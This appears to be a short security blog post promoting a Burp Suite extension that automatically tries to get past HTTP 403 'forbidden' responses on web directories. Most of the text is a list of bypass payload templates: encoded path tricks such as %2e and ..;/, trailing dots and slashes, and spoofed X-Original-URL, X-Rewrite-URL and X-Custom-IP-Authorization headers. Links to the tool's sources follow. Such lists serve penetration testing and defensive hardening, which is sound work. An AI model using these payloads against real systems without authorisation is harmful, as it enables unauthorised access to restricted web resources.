![[Tools] Bypass 403 Fuzzer @sting8k](https://cdn.hashnode.com/res/hashnode/image/upload/v1628581783742/P8LoHet4B.gif?w=1600&h=840&fit=crop&crop=entropy&auto=format,compress&gif-q=60&format=webm)
An burpsuite extension to bypass 403 restricted directory. By using PassiveScan (default enabled), each 403 request will be automatically scanned by this extension, so just add to burpsuite and enjoy.
Payload: $1: HOSTNAME $2: PATH
$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2 -H "X-Original-URL: /$2"
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1"
$1/$2 -H "X-Rewrite-URL: /$2"
$1/$2%20/
$1/%20$2%20/
$1/$2..;/
Nguồn:
https://twitter.com/iam_j0ker/status/1324354024657711106?s=20
https://twitter.com/jae_hak99/status/1297556269960540161?s=20
https://twitter.com/SalahHasoneh1/status/1296572143141031945
Github:
https://github.com/iamj0ker/bypass-403
Github released:
Burpsuite Extension: https://github.com/sting8k/BurpSuite_403Bypasser.